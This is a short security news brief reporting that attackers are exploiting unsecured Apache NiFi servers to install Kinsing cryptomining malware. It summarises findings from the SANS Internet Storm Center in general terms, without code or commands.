Apache NiFi targeted in cryptomining attacks

Vulnerable Apache NiFi implementations are being targeted in new attacks deploying the Kinsing cryptomining malware, as indicated by the significant increase in HTTP requests for "/nifi" on May 19, according to The Hacker News. After securing initial access to unprotected Apache NiFi instances, attackers have been deploying a shell script that facilitates firewall deactivation and cryptomining tool termination prior to the download and execution of Kinsing malware, a report from the SANS Internet Storm Center revealed. Timed processors or entries to cron have been leveraged to help the malware achieve persistence, while attack scripts have been stored in memory alone, according to SANS Technology Institute Dean of Research Dr. Johannes Ullrich. "Due to its use as a data processing platform, NiFi servers often have access to business-critical data. NiFi servers are likely attractive targets as they are configured with larger CPUs to support data transformation tasks. The attack is trivial if the NiFi server is not secured," said SANS ISC.